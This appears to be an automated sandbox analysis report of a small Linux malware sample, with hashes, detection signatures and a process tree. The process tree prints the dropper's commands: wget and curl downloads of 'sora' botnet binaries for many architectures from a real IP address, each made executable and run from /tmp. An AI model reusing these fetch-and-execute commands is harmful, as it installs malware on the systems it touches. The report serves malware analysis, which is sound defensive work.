Analysis
-
max time kernel
30s -
max time network
31s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240226-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28-03-2024 10:06
Static task
static1
Behavioral task
behavioral1
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
-
Size
1KB
-
MD5
02ca1bec2de42845c35867af0dc72be3
-
SHA1
d2fc439476dd4ec34fce01257762a34b0aa6f3d5
-
SHA256
848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
-
SHA512
302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
Malware Config
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 740 robben /tmp/robben 747 robben /tmp/robben 754 robben /tmp/robben 760 robben /tmp/robben 766 robben /tmp/robben 777 robben /tmp/robben 793 robben /tmp/robben 808 robben /tmp/robben 828 robben /tmp/robben 844 robben -
Reads runtime system information 10 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc File opened for modification /tmp/robben
Processes
-
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes1181⤵
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.x862⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.x862⤵
- Reads runtime system information
-
/bin/catcat sora.x862⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mips2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mips2⤵
- Reads runtime system information
-
/bin/catcat sora.mips2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mpsl2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mpsl2⤵
- Reads runtime system information
-
/bin/catcat sora.mpsl2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm42⤵
- Reads runtime system information
-
/bin/catcat sora.arm42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm52⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm52⤵
- Reads runtime system information
-
/bin/catcat sora.arm52⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm62⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm62⤵
- Reads runtime system information
-
/bin/catcat sora.arm62⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm72⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm72⤵
- Reads runtime system information
-
/bin/catcat sora.arm72⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.ppc2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.ppc2⤵
- Reads runtime system information
-
/bin/catcat sora.ppc2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.m68k2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.m68k2⤵
- Reads runtime system information
-
/bin/catcat sora.m68k2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.sh42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.sh42⤵
- Reads runtime system information
-
/bin/catcat sora.sh42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE